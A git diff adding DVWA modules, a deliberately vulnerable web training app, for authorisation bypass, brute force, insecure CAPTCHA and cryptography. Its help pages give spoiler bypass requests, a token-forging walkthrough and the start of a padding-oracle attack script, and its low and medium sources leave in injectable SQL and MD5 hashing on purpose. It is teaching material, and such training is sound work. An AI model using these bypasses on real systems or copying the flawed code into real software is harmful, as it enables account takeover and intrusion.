+ + + Low Level+Non-admin users do not have the 'Authorisation Bypass' menu option. +Spoiler: Try browsing directly to /vulnerabilities/authbypass/. + + ++ + Medium Level+The developer has locked down access to the HTML for the page, but have a look how the page is populated when logged in as the admin. +Spoiler: Try browsing directly to /vulnerabilities/authbypass/get_user_data.php to access the API which returns the user data for the page. + ++ + High Level+Both the HTML page and the API to retrieve data have been locked down, but what about updating data? You have to make sure you test every call to the site. +Spoiler: GET calls to retrieve data have been locked down but the POST to update the data has been missed, can you figure out how to call it? + +Spoiler: This is one way to do it: + +fetch('change_user_details.php', {
+method: 'POST',
+headers: {
+'Accept': 'application/json',
+'Content-Type': 'application/json'
+},
+body: JSON.stringify({ 'id':1, "first_name": "Harry", "surname": "Hacker" })
+}
+)
+.then((response) => response.json())
+.then((data) => console.log(data));
+
+
+ + + Impossible Level++ Hopefully on this level all the functions correctly check authorisation before allowing access to the data. + ++ There may however be some non-authorisation related issues on the page, so do not write it off as fully secure. + + |
+
+ +
Reference:
+Reference:
+Reference:
+ +Vulnerability: Authorisation Bypass
+ +This page should only be accessible by the admin user. Your challenge is to gain access to the features using one of the other users, for example gordonb / abc123.
+ +
+
+
+
+
+
+
+
+";
+
+$page[ 'body' ] .= '
+ ' .
+ $html
+ . '
+
+';
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/authbypass/source/high.php b/DVWA/vulnerabilities/authbypass/source/high.php
new file mode 100644
index 00000000..9517d944
--- /dev/null
+++ b/DVWA/vulnerabilities/authbypass/source/high.php
@@ -0,0 +1,17 @@
+
diff --git a/DVWA/vulnerabilities/authbypass/source/impossible.php b/DVWA/vulnerabilities/authbypass/source/impossible.php
new file mode 100644
index 00000000..70ba2e02
--- /dev/null
+++ b/DVWA/vulnerabilities/authbypass/source/impossible.php
@@ -0,0 +1,13 @@
+
diff --git a/DVWA/vulnerabilities/authbypass/source/low.php b/DVWA/vulnerabilities/authbypass/source/low.php
new file mode 100644
index 00000000..34a169b8
--- /dev/null
+++ b/DVWA/vulnerabilities/authbypass/source/low.php
@@ -0,0 +1,11 @@
+
diff --git a/DVWA/vulnerabilities/authbypass/source/medium.php b/DVWA/vulnerabilities/authbypass/source/medium.php
new file mode 100644
index 00000000..3e1b126e
--- /dev/null
+++ b/DVWA/vulnerabilities/authbypass/source/medium.php
@@ -0,0 +1,18 @@
+
diff --git a/DVWA/vulnerabilities/brute/help/help.php b/DVWA/vulnerabilities/brute/help/help.php
new file mode 100644
index 00000000..69b1ae95
--- /dev/null
+++ b/DVWA/vulnerabilities/brute/help/help.php
@@ -0,0 +1,69 @@
++ Welcome to the user manager, please enjoy updating your user\'s details. +
+ '; + +$page[ 'body' ] .= " + + +| ID | +First Name | +Surname | +Update | + + + +
|---|
+
+ +
diff --git a/DVWA/vulnerabilities/brute/index.php b/DVWA/vulnerabilities/brute/index.php
new file mode 100644
index 00000000..71d57afe
--- /dev/null
+++ b/DVWA/vulnerabilities/brute/index.php
@@ -0,0 +1,68 @@
+
+ Help - Brute Force (Login)
+ +
+
+
+
+
+
+
+ About+Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. + A common approach is to repeatedly try guesses for the password. + +Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, family names, any too short password + (usually thought to be less than 6 or 7 characters), or predictable patterns + (e.g. alternating vowels and consonants, which is known as leetspeak, so "password" becomes "p@55w0rd"). + +Creating a targeted wordlists, which is generated towards the target, often gives the highest success rate. There are public tools out there that will create a dictionary + based on a combination of company websites, personal social networks and other common information (such as birthdays or year of graduation). + + A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always + be successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords + making the attack time longer. + ++ + Objective+Your goal is to get the administrator’s password by brute forcing. Bonus points for getting the other four user passwords! + ++ + Low Level+The developer has completely missed out any protections methods, allowing for anyone to try as many times as they wish, to login to any user without any repercussions. + ++ + Medium Level+This stage adds a sleep on the failed login screen. This mean when you login incorrectly, there will be an extra two second wait before the page is visible. + +This will only slow down the amount of requests which can be processed a minute, making it longer to brute force. + ++ + High Level+There has been an "anti Cross-Site Request Forgery (CSRF) token" used. There is a old myth that this protection will stop brute force attacks. This is not the case. + This level also extends on the medium level, by waiting when there is a failed login but this time it is a random amount of time between two and four seconds. + The idea of this is to try and confuse any timing predictions. + +Using a form could have a similar effect as a CSRF token. + ++ + Impossible Level+Brute force (and user enumeration) should not be possible in the impossible level. The developer has added a "lock out" feature, where if there are five bad logins within + the last 15 minutes, the locked out user cannot log in. + +If the locked out user tries to login, even with a valid password, it will say their username or password is incorrect. This will make it impossible to know + if there is a valid account on the system, with that password, and if the account is locked. + +This can cause a "Denial of Service" (DoS), by having someone continually trying to login to someone's account. + This level would need to be extended by blacklisting the attacker (e.g. IP address, country, user-agent). + |
+
+ +
Reference:
+Vulnerability: Brute Force
+ +
+
+
+ Login
+ + + {$html} +More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/Brute_force_attack' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.symantec.com/connect/articles/password-crackers-ensuring-security-your-password' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.golinuxcloud.com/brute-force-attack-web-forms' ) . " +
Welcome to the password protected area {$user}
"; + $html .= ""; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/brute/source/impossible.php b/DVWA/vulnerabilities/brute/source/impossible.php new file mode 100644 index 00000000..4cf59258 --- /dev/null +++ b/DVWA/vulnerabilities/brute/source/impossible.php @@ -0,0 +1,102 @@ +prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); + $row = $data->fetch(); + + // Check to see if the user has been locked out. + if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) { + // User locked out. Note, using this method would allow for user enumeration! + //$html .= "
Username and/or password incorrect.
"; + + // Calculate when the user would be allowed to login again + $last_login = strtotime( $row[ 'last_login' ] ); + $timeout = $last_login + ($lockout_time * 60); + $timenow = time(); + + /* + print "The last login was: " . date ("h:i:s", $last_login) . "
This account has been locked due to too many incorrect logins.
"; + print "The timenow is: " . date ("h:i:s", $timenow) . "
"; + print "The timeout is: " . date ("h:i:s", $timeout) . "
"; + */ + + // Check to see if enough time has passed, if it hasn't locked the account + if( $timenow < $timeout ) { + $account_locked = true; + // print "The account is locked
"; + } + } + + // Check the database (if username matches the password) + $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR); + $data->bindParam( ':password', $pass, PDO::PARAM_STR ); + $data->execute(); + $row = $data->fetch(); + + // If its a valid login... + if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) { + // Get users details + $avatar = $row[ 'avatar' ]; + $failed_login = $row[ 'failed_login' ]; + $last_login = $row[ 'last_login' ]; + + // Login successful + $html .= "
Welcome to the password protected area {$user}
"; + $html .= "Warning: Someone might of been brute forcing your account.
"; + $html .= "Number of login attempts: {$failed_login}.
Last login attempt was at: {$last_login}.
"; + + // Update bad login count + $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); + } + + // Set the last login time + $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/brute/source/low.php b/DVWA/vulnerabilities/brute/source/low.php new file mode 100644 index 00000000..aef430a1 --- /dev/null +++ b/DVWA/vulnerabilities/brute/source/low.php @@ -0,0 +1,32 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + if( $result && mysqli_num_rows( $result ) == 1 ) { + // Get users details + $row = mysqli_fetch_assoc( $result ); + $avatar = $row["avatar"]; + + // Login successful + $html .= "
Username and/or password incorrect.
Alternative, the account has been locked because of too many failed logins.
If this is the case, please try again in {$lockout_time} minutes.
Welcome to the password protected area {$user}
"; + $html .= ""; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/brute/source/medium.php b/DVWA/vulnerabilities/brute/source/medium.php new file mode 100644 index 00000000..a14b9db3 --- /dev/null +++ b/DVWA/vulnerabilities/brute/source/medium.php @@ -0,0 +1,35 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + if( $result && mysqli_num_rows( $result ) == 1 ) { + // Get users details + $row = mysqli_fetch_assoc( $result ); + $avatar = $row["avatar"]; + + // Login successful + $html .= "
Username and/or password incorrect.
Welcome to the password protected area {$user}
"; + $html .= ""; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/captcha/help/help.php b/DVWA/vulnerabilities/captcha/help/help.php new file mode 100644 index 00000000..f2ce041d --- /dev/null +++ b/DVWA/vulnerabilities/captcha/help/help.php @@ -0,0 +1,62 @@ +
Username and/or password incorrect.
+
+ +
diff --git a/DVWA/vulnerabilities/captcha/index.php b/DVWA/vulnerabilities/captcha/index.php
new file mode 100644
index 00000000..a0d76fd7
--- /dev/null
+++ b/DVWA/vulnerabilities/captcha/index.php
@@ -0,0 +1,98 @@
+reCAPTCHA API key missing from config file: " . realpath( getcwd() . DIRECTORY_SEPARATOR . DVWA_WEB_PAGE_TO_ROOT . "config" . DIRECTORY_SEPARATOR . "config.inc.php" ) . "";
+ $html = "Please register for a key from reCAPTCHA: " . dvwaExternalLinkUrlGet( 'https://www.google.com/recaptcha/admin/create' );
+ $hide_form = true;
+}
+
+$page[ 'body' ] .= "
+ Help - Insecure CAPTCHA
+ +
+
+
+
+
+
+
+ About+A is a program that can tell whether its user is a human or a computer. You've probably seen + them - colourful images with distorted text at the bottom of Web registration forms. CAPTCHAs are used by many websites to prevent abuse from + "bots", or automated programs usually written to generate spam. No computer program can read distorted text as well as humans can, so bots + cannot navigate sites protected by CAPTCHAs. + +CAPTCHAs are often used to protect sensitive functionality from automated bots. Such functionality typically includes user registration and changes, + password changes, and posting content. In this example, the CAPTCHA is guarding the change password functionality for the user account. This provides + limited protection from CSRF attacks as well as automated bot guessing. + ++ + Objective+Your aim, change the current user's password in a automated manner because of the poor CAPTCHA system. + ++ + Low Level+The issue with this CAPTCHA is that it is easily bypassed. The developer has made the assumption that all users will progress through screen 1, complete the CAPTCHA, and then + move on to the next screen where the password is actually updated. By submitting the new password directly to the change page, the user may bypass the CAPTCHA system. + +The parameters required to complete this challenge in low security would be similar to the following: +Spoiler: ?step=2&password_new=password&password_conf=password&Change=Change.
+
+ + + Medium Level+The developer has attempted to place state around the session and keep track of whether the user successfully completed the + CAPTCHA prior to submitting data. Because the state variable (Spoiler: passed_captcha) is on the client side, + it can also be manipulated by the attacker like so: +Spoiler: ?step=2&password_new=password&password_conf=password&passed_captcha=true&Change=Change.
+
+ + + High Level+There has been development code left in, which was never removed in production. It is possible to mimic the development values, to allow + invalid values in be placed into the CAPTCHA field. +You will need to spoof your user-agent (Spoiler: reCAPTCHA) as well as use the CAPTCHA value of + (Spoiler: hidd3n_valu3) to skip the check. + ++ + Impossible Level+In the impossible level, the developer has removed all avenues of attack. The process has been simplified so that data and CAPTCHA verification occurs in one + single step. Alternatively, the developer could have moved the state variable server side (from the medium level), so the user cannot alter it. + |
+
+ +
Reference:
+
+
\n";
+
+dvwaHtmlEcho( $page );
+
+?>
diff --git a/DVWA/vulnerabilities/captcha/source/high.php b/DVWA/vulnerabilities/captcha/source/high.php
new file mode 100644
index 00000000..fb03377f
--- /dev/null
+++ b/DVWA/vulnerabilities/captcha/source/high.php
@@ -0,0 +1,55 @@
+' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );
+
+ // Feedback for user
+ $html .= "Vulnerability: Insecure CAPTCHA
+ + {$WarningHtml} + +
+ \n";
+
+if( $vulnerabilityFile == 'impossible.php' ) {
+ $page[ 'body' ] .= "
+ Current password:
+
"; +} + +$page[ 'body' ] .= " New password:
+
+ Confirm new password:
+
+ + " . recaptcha_get_html( $_DVWA[ 'recaptcha_public_key' ] ); +if( $vulnerabilityFile == 'high.php' ) + $page[ 'body' ] .= "\n\n \n"; + +if( $vulnerabilityFile == 'high.php' || $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= "\n " . tokenField(); + +$page[ 'body' ] .= " +
+ + + + {$html} +
+
+ +
"; +} + +$page[ 'body' ] .= " New password:
+
+ Confirm new password:
+
+ + " . recaptcha_get_html( $_DVWA[ 'recaptcha_public_key' ] ); +if( $vulnerabilityFile == 'high.php' ) + $page[ 'body' ] .= "\n\n \n"; + +if( $vulnerabilityFile == 'high.php' || $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= "\n " . tokenField(); + +$page[ 'body' ] .= " +
+ + + + {$html} +
More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/CAPTCHA' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.google.com/recaptcha/' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-009_CAPTCHA_Defeat' ) . " +
Password Changed."; + + } else { + // Ops. Password mismatch + $html .= "
Both passwords must match."; + $hide_form = false; + } + + } else { + // What happens when the CAPTCHA was entered incorrectly + $html .= "
"; + $hide_form = false; + return; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/captcha/source/impossible.php b/DVWA/vulnerabilities/captcha/source/impossible.php new file mode 100644 index 00000000..5bb475d8 --- /dev/null +++ b/DVWA/vulnerabilities/captcha/source/impossible.php @@ -0,0 +1,67 @@ +
The CAPTCHA was incorrect. Please try again.
The CAPTCHA was incorrect. Please try again."; + $hide_form = false; + } + else { + // Check that the current password is correct + $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); + $data->execute(); + + // Do both new password match and was the current password correct? + if( ( $pass_new == $pass_conf) && ( $data->rowCount() == 1 ) ) { + // Update the database + $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); + $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->execute(); + + // Feedback for the end user - success! + $html .= "
Password Changed."; + } + else { + // Feedback for the end user - failed! + $html .= "
Either your current password is incorrect or the new passwords did not match."; + $hide_form = false; + } + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/captcha/source/low.php b/DVWA/vulnerabilities/captcha/source/low.php new file mode 100644 index 00000000..bfedb56d --- /dev/null +++ b/DVWA/vulnerabilities/captcha/source/low.php @@ -0,0 +1,75 @@ +
Please try again.
The CAPTCHA was incorrect. Please try again."; + $hide_form = false; + return; + } + else { + // CAPTCHA was correct. Do both new passwords match? + if( $pass_new == $pass_conf ) { + // Show next stage for the user + $html .= " +
+ "; + } + else { + // Both new passwords do not match. + $html .= "
You passed the CAPTCHA! Click the button to confirm your changes.
Both passwords must match."; + $hide_form = false; + } + } +} + +if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { + // Hide the CAPTCHA form + $hide_form = true; + + // Get input + $pass_new = $_POST[ 'password_new' ]; + $pass_conf = $_POST[ 'password_conf' ]; + + // Check to see if both password match + if( $pass_new == $pass_conf ) { + // They do! + $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); + $pass_new = md5( $pass_new ); + + // Update database + $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; + $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '
' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + // Feedback for the end user + $html .= "
Password Changed."; + } + else { + // Issue with the passwords matching + $html .= "
Passwords did not match."; + $hide_form = false; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/captcha/source/medium.php b/DVWA/vulnerabilities/captcha/source/medium.php new file mode 100644 index 00000000..1f76e951 --- /dev/null +++ b/DVWA/vulnerabilities/captcha/source/medium.php @@ -0,0 +1,83 @@ +
The CAPTCHA was incorrect. Please try again."; + $hide_form = false; + return; + } + else { + // CAPTCHA was correct. Do both new passwords match? + if( $pass_new == $pass_conf ) { + // Show next stage for the user + $html .= " +
+ "; + } + else { + // Both new passwords do not match. + $html .= "
You passed the CAPTCHA! Click the button to confirm your changes.
Both passwords must match."; + $hide_form = false; + } + } +} + +if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { + // Hide the CAPTCHA form + $hide_form = true; + + // Get input + $pass_new = $_POST[ 'password_new' ]; + $pass_conf = $_POST[ 'password_conf' ]; + + // Check to see if they did stage 1 + if( !$_POST[ 'passed_captcha' ] ) { + $html .= "
"; + $hide_form = false; + return; + } + + // Check to see if both password match + if( $pass_new == $pass_conf ) { + // They do! + $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); + $pass_new = md5( $pass_new ); + + // Update database + $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; + $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '
You have not passed the CAPTCHA.
' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + // Feedback for the end user + $html .= "
Password Changed."; + } + else { + // Issue with the passwords matching + $html .= "
Passwords did not match."; + $hide_form = false; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/cryptography/help/help.php b/DVWA/vulnerabilities/cryptography/help/help.php new file mode 100644 index 00000000..3b663013 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/help/help.php @@ -0,0 +1,180 @@ + + +
+
diff --git a/DVWA/vulnerabilities/cryptography/index.php b/DVWA/vulnerabilities/cryptography/index.php
new file mode 100644
index 00000000..c8a58222
--- /dev/null
+++ b/DVWA/vulnerabilities/cryptography/index.php
@@ -0,0 +1,65 @@
+
+ Help - Cryptographic Problems
+ +
+
+
+
+
+
+
+ About++ Cryptography is key area of security and is used to keep secrets secret. When implemented badly these secrets can be leaked or the crypto manipulated to bypass protections. + ++ This module will look at three weaknesses, using encoding instead of encryption, using algorithms with known weaknesses, and padding oracle attacks. + + ++ + Objective+Each level has its own objective but the general idea is to exploit weak cryptographic implementations. + ++ + Low Level+The thing to notice is the mention of encoding rather than encryption, that should give you a hint about the vulnerability here. ++ + +
+
+
+ Start by encoding a few messages and looking at the output, if you have spent any time around encoding standards you should be able to tell that it is in Base64. Could it be that simple? Try Base64 decoding some test strings to find out: ++That failed, but what you might notice is that the number of output characters matches the number of input characters. Another common encoding method that is sometimes mistaken for encryption is XOR, this takes the clear text input and XORs each character with a key which is repeated or truncated to be the same length as the input. ++XOR is associative, this means that if you XOR the clear text with the key you get the cipher text and if you XOR the cipher text with the key you get the clear text, what it also means is if you XOR the clear text with the cipher text, you get the key. Let's try this with our examples: + ++This looks promising, let's try the second example: + ++There is no repetition in the key yet so let's try with a longer string. + + ++It looks like we have found our key "wachtwoord". Let's give it a try on our challenge string: + + ++And there we have it, the message we are looking for and the password we need to login. + + +Another lesson here, do not assume that the messages or the underlying system you are working with is in English. The key "wachtwoord" is Dutch for password. +Medium Level+The tokens are encrypted using an Electronic Code Book based algorithm (AES-128-ECB). In this mode, the clear text is broken down into fixed sized blocks and each block is encrypted independently of the rest. This results in a cipher text that is made up from a number of individual blocks with no way to tie them together. Worse than this, any two blocks, from any two clear text inputs, are interchangeable as long as they have been encrypted with the same key. In our example, this means you can take blocks from the three different tokens to make your own token. ++ + +
+
+
+ + How do you know the block size? This is given in the algorithm name. aes-128-ebc is a 128 bit block cipher. 128 bits is 16 bytes, but to make things human readable, the bytes are represented as hex characters meaning each byte is two characters. This gives you a block size of 32 characters. Sooty's token is 192 characters long, 192 / 32 = 6 and so Sooty's token has six code blocks. + + ++Let's start by breaking the tokens down into blocks. +Sooty: +Sweep: +Soo: ++ Each token has broken down nicely into blocks so we are on the right track. + ++ If you look carefully at the blocks you will see that there are some that repeat over the different tokens, this means that the same clear text has been encrypted to create the block. If we look at the description we can try to map these to the JSON object. + ++ Taking Sooty as an example: + +Sooty: ++ Assuming we are right with our mappings, if you compare the blocks that match you can see that Sooty and Sweep both have the same expiry block (b85bb230876912bf3c66e50758b222d0) and both Sweep and Soo have the same level block (83f2d277d9e5fb9a951e74bee57c77a3). This matches with what we know about the tokens as both Sooty and Sweep have expired tokens and both Sweep and Soo are users, not admins. + ++ Knowing all this, we can now create our forged session token. We need to take the username block from Sweep, the expiry block from Soo and the level block from Sooty. We can then finish the token off with the remaining blocks from any of the tokens. This gives us: + ++ Which gives us... + ++ + ++ This is a very contrived setup with the tokens tweaked to force blocks to map to the JSON object so manipulation is easier to do, in the real world it is unlikely to be this easy however as data is often formed from fixed sized blocks overlaps can happen in a way that mixing blocks up results in valid data. Sometimes just being able to pass invalid data is enough so all that is needed is to swap blocks in a way that they can be decrypted and then passed on to the rest of the system where they will cause errors. + ++ If you want to play with this some more, there is a script called ecb_attack.php in the sources directory which shows how the tokens were generated and lets you combine them in different ways to create custom tokens. + +High Level+The system is using AES-128-CBC which means it is vulnerable to a padding oracle attack. + ++ + + +
+
+
+ Rather than try to explain this here, go read this excellent write up on the attack by Eli Sohl. +Cryptopals: Exploiting CBC Padding Oracles ++ If you want to play with this some more, there is a script called oracle_attack.php in the sources directory which runs through the full attack with debug. You can run this either against the DVWA site or it will run locally against its own pretend web server. + +Impossible Level+You can never say impossible in crypto as something that would take years today could take minutes in the future when a new attack is found or when processing power takes a giant leam forward. ++ The current recommended alternative to AES-CBC is AES-GCM and so the system uses that here. 256 bit blocks rather than 128 bit blocks are used, and a unique IV used for every message. This may be secure today but who knows what tomorrow brings? + + |
+
Vulnerability: Cryptography Problems
+ +
+";
+
+$page[ 'body' ] .= "
+ {$html}
+
+
+ More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://exploit-notes.hdks.org/exploit/cryptography/algorithm/aes-ecb-padding-attack', "AES-ECB Padding Attack" ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.scottbrady91.com/cryptopals/implementing-and-breaking-aes-ecb', "Implementing and breaking AES ECB") . " +
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation', "Wikipedia - Block cipher mode of operation" ) . " +
- " . dvwaExternalLinkUrlGet( 'https://www.nccgroup.com/us/research-blog/cryptopals-exploiting-cbc-padding-oracles/', "Cryptopals: Exploiting CBC Padding Oracles - Best article") . " +
- " . dvwaExternalLinkUrlGet( 'https://yurichev.org/pkcs7/', "[Crypto] PKCS#7 padding") . " +
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Padding_oracle_attack', "Padding oracle attack") . " +
- " . dvwaExternalLinkUrlGet( 'https://medium.com/@masjadaan/oracle-padding-attack-a61369993c86', "Oracle Padding Attack") . " +
- " . dvwaExternalLinkUrlGet( 'https://robertheaton.com/2013/07/29/padding-oracle-attack/', "The Padding Oracle Attack") . " +
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Padding_%28cryptography%29', "Wikipedia - Padding (cryptography)") . " +
- " . dvwaExternalLinkUrlGet( 'https://gchq.github.io/CyberChef/', "CyberChef") . " +
- " . dvwaExternalLinkUrlGet( 'https://www.101computing.net/xor-encryption-algorithm/', "XOR Encryption Algorithm") . " +
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/XOR_cipher', "XOR Cipher") . " +
- " . dvwaExternalLinkUrlGet( 'https://www.youtube.com/watch?v=7WySPRERN0Q', "Video walk-through by CryptoCat") . " +
+ You have managed to steal the following token from a user of the Prognostication application. +
++ +
++ You can use the form below to provide the token to access the system. You have two challenges, first, decrypt the token to find out the secret it contains, and then create a new token to access the system as a other users. See if you can make yourself an administrator. +
++ +"; + +?> diff --git a/DVWA/vulnerabilities/cryptography/source/impossible.php b/DVWA/vulnerabilities/cryptography/source/impossible.php new file mode 100644 index 00000000..6e5342d1 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/impossible.php @@ -0,0 +1,70 @@ + + function send_token() { + + const url = 'source/check_token_impossible.php'; + const data = document.getElementById ('token').value; + + console.log (data); + + fetch(url, { + method: 'POST', + headers: { + 'Content-Type': 'application/json' + }, + body: data + }) + .then(response => { + if (!response.ok) { + throw new Error('Network response was not ok'); + } + return response.json(); + }) + .then(data => { + console.log(data); + message_line = document.getElementById ('message'); + if (data.status == 200) { + message_line.innerText = 'Welcome back ' + data.user + ' (' + data.level + ')'; + message_line.setAttribute('class', 'success'); + } else { + message_line.innerText = 'Error: ' + data.message; + message_line.setAttribute('class', 'warning'); + } + }) + .catch(error => { + console.error('There was a problem with your fetch operation:', error); + }); + + } + +
+ You have managed to steal the following token from a user of the Impervious application. +
++ +
++ This being the impossible level, you should not be able to mess with the token in any useful way but feel free to try below. +
++ +"; + +?> diff --git a/DVWA/vulnerabilities/cryptography/source/low.php b/DVWA/vulnerabilities/cryptography/source/low.php new file mode 100644 index 00000000..235ed19d --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/low.php @@ -0,0 +1,112 @@ +getMessage(); + } +} + +$html = " +
+ This super secure system will allow you to exchange messages with your friends without anyone else being able to read them. Use the box below to encode and decode messages. +
+ +"; + +if (!is_null ($encoded)) { + $html .= " ++
"; +} + +$html .= " ++
+ You have intercepted the following message, decode it and log in below. +
++ +
+"; + +if ($errors != "") { + $html .= '' . $errors . '
';
+}
+
+if ($messages != "") {
+ $html .= '' . $messages . '
';
+}
+
+if ($success != "") {
+ $html .= '' . $success . '
';
+}
+
+$html .= "
+
+";
+?>
diff --git a/DVWA/vulnerabilities/cryptography/source/medium.php b/DVWA/vulnerabilities/cryptography/source/medium.php
new file mode 100644
index 00000000..b07efcc3
--- /dev/null
+++ b/DVWA/vulnerabilities/cryptography/source/medium.php
@@ -0,0 +1,110 @@
+user == "sweep" && $user->ex > time() && $user->level == "admin") {
+ $success = "Welcome administrator Sweep";
+ } else {
+ $messages = "Login successful but not as the right user.";
+ }
+ }
+ }
+ } catch(Exception $e) {
+ $errors = $e->getMessage();
+ }
+}
+
+$html = "
+ + You have managed to get hold of three session tokens for an application you think is using poor cryptography to protect its secrets: +
++ Sooty (admin), session expired +
++ +
++ Sweep (user), session expired +
++ +
++ Soo (user), session valid +
++ +
++ Based on the documentation, you know the format of the token is: +
+{
+ \"user\": \"example\",
+ \"ex\": 1723620372,
+ \"level\": \"user\",
+ \"bio\": \"blah\"
+}+You also spot this comment in the docs: +
++To ensure your security, we use aes-128-ecb throughout our application. ++ +
+
+ Manipulate the session tokens you have captured to log in as Sweep with admin privileges. +"; + +if ($errors != "") { + $html .= '
' . $errors . '
';
+}
+
+if ($messages != "") {
+ $html .= '' . $messages . '
';
+}
+
+if ($success != "") {
+ $html .= '' . $success . '
';
+}
+
+$html .= "
+
+";
+?>
diff --git a/DVWA/vulnerabilities/cryptography/source/oracle_attack.php b/DVWA/vulnerabilities/cryptography/source/oracle_attack.php
new file mode 100644
index 00000000..3ecb454b
--- /dev/null
+++ b/DVWA/vulnerabilities/cryptography/source/oracle_attack.php
@@ -0,0 +1,318 @@
+ $token,
+ "iv" => $iv_string_b64
+ );
+
+ if (is_null ($url)) {
+ $body = check_token (json_encode ($data));
+ } else {
+ $ch = curl_init();
+
+ curl_setopt($ch, CURLOPT_URL, $url);
+ curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json', 'Accept:application/json'));
+ curl_setopt($ch, CURLOPT_POST, 1);
